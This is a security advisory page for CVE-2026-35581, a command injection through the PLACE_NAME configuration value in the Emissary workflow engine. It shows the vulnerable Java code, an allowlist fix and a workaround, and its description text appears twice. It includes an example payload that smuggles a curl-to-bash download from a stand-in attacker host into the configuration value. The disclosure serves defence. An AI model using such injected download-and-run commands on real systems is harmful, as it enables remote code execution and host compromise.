Monitor vulnerabilities like this one.
Sign up free to get alerted when software you use is affected.
7.2
Emissary Workflow Engine Exposes User Data to Command Injection
CVE-2026-35581
GHSA-6c37-7w4p-jg9v
Summary
A software error in Emissary's workflow engine can allow attackers to inject malicious commands, potentially leading to data theft or system compromise. To protect your system, update to version 8.39.0 or later.
What to do
- Update gov.nsa.emissary:emissary to version 8.39.0.
Affected software
| Vendor | Product | Affected versions | Fix available |
|---|---|---|---|
| – | gov.nsa.emissary:emissary | <= 8.39.0 | 8.39.0 |
Original title
Emissary has a Command Injection via PLACE_NAME Configuration in Executrix
Original description
## Summary
The `Executrix` utility class constructed shell commands by concatenating
configuration-derived values — including the `PLACE_NAME` parameter — with
insufficient sanitization. Only spaces were replaced with underscores, allowing
shell metacharacters (`;`, `|`, `$`, `` ` ``, `(`, `)`, etc.) to pass through
into `/bin/sh -c` command execution.
## Details
### Vulnerable code — `Executrix.java`
**Insufficient sanitization (line 132):**
```java
this.placeName = this.placeName.replace(' ', '_');
// ONLY replaces spaces — shell metacharacters pass through
```
**Shell sink (line 1052–1058):**
```java
protected String[] getTimedCommand(final String c) {
return new String[] {"/bin/sh", "-c", "ulimit -c 0; cd " + tmpNames[DIR] + "; " + c};
}
```
### Data flow
1. `PLACE_NAME` is read from a configuration file
2. `Executrix` applies only a space-to-underscore replacement
3. The `placeName` is used to construct temporary directory paths (`tmpNames[DIR]`)
4. `tmpNames[DIR]` is concatenated into a shell command string
5. The command is executed via `/bin/sh -c`
### Example payload
```
PLACE_NAME = "test;curl attacker.com/shell.sh|bash;x"
```
After the original sanitization: `test;curl_attacker.com/shell.sh|bash;x`
(semicolons, pipes, and other metacharacters preserved)
### Impact
- Arbitrary command execution on the Emissary host
- Requires the ability to control configuration values (e.g., administrative
access or a compromised configuration source)
## Remediation
Fixed in [PR #1290](https://github.com/NationalSecurityAgency/emissary/pull/1290),
merged into release 8.39.0.
The space-only replacement was replaced with an allowlist regex that strips all
characters not matching `[a-zA-Z0-9_-]`:
```java
protected static final Pattern INVALID_PLACE_NAME_CHARS = Pattern.compile("[^a-zA-Z0-9_-]");
protected static String cleanPlaceName(final String placeName) {
return INVALID_PLACE_NAME_CHARS.matcher(placeName).replaceAll("_");
}
```
This ensures that any shell metacharacter in the `PLACE_NAME` configuration
value is replaced with an underscore before it can reach a command string.
Tests were added to verify that parentheses, slashes, dots, hash, dollar signs,
backslashes, quotes, semicolons, carets, and at-signs are all sanitized.
## Workarounds
If upgrading is not immediately possible, ensure that `PLACE_NAME` values in all
configuration files contain only alphanumeric characters, underscores, and hyphens.
## References
- [PR #1290 — validate placename with an allowlist](https://github.com/NationalSecurityAgency/emissary/pull/1290)
- Original report: GHSA-wjqm-p579-x3ww
The `Executrix` utility class constructed shell commands by concatenating
configuration-derived values — including the `PLACE_NAME` parameter — with
insufficient sanitization. Only spaces were replaced with underscores, allowing
shell metacharacters (`;`, `|`, `$`, `` ` ``, `(`, `)`, etc.) to pass through
into `/bin/sh -c` command execution.
## Details
### Vulnerable code — `Executrix.java`
**Insufficient sanitization (line 132):**
```java
this.placeName = this.placeName.replace(' ', '_');
// ONLY replaces spaces — shell metacharacters pass through
```
**Shell sink (line 1052–1058):**
```java
protected String[] getTimedCommand(final String c) {
return new String[] {"/bin/sh", "-c", "ulimit -c 0; cd " + tmpNames[DIR] + "; " + c};
}
```
### Data flow
1. `PLACE_NAME` is read from a configuration file
2. `Executrix` applies only a space-to-underscore replacement
3. The `placeName` is used to construct temporary directory paths (`tmpNames[DIR]`)
4. `tmpNames[DIR]` is concatenated into a shell command string
5. The command is executed via `/bin/sh -c`
### Example payload
```
PLACE_NAME = "test;curl attacker.com/shell.sh|bash;x"
```
After the original sanitization: `test;curl_attacker.com/shell.sh|bash;x`
(semicolons, pipes, and other metacharacters preserved)
### Impact
- Arbitrary command execution on the Emissary host
- Requires the ability to control configuration values (e.g., administrative
access or a compromised configuration source)
## Remediation
Fixed in [PR #1290](https://github.com/NationalSecurityAgency/emissary/pull/1290),
merged into release 8.39.0.
The space-only replacement was replaced with an allowlist regex that strips all
characters not matching `[a-zA-Z0-9_-]`:
```java
protected static final Pattern INVALID_PLACE_NAME_CHARS = Pattern.compile("[^a-zA-Z0-9_-]");
protected static String cleanPlaceName(final String placeName) {
return INVALID_PLACE_NAME_CHARS.matcher(placeName).replaceAll("_");
}
```
This ensures that any shell metacharacter in the `PLACE_NAME` configuration
value is replaced with an underscore before it can reach a command string.
Tests were added to verify that parentheses, slashes, dots, hash, dollar signs,
backslashes, quotes, semicolons, carets, and at-signs are all sanitized.
## Workarounds
If upgrading is not immediately possible, ensure that `PLACE_NAME` values in all
configuration files contain only alphanumeric characters, underscores, and hyphens.
## References
- [PR #1290 — validate placename with an allowlist](https://github.com/NationalSecurityAgency/emissary/pull/1290)
- Original report: GHSA-wjqm-p579-x3ww
nvd CVSS3.1
7.2
Vulnerability type
CWE-78
OS Command Injection
Published: 8 Apr 2026 · Updated: 8 Apr 2026 · First seen: 7 Apr 2026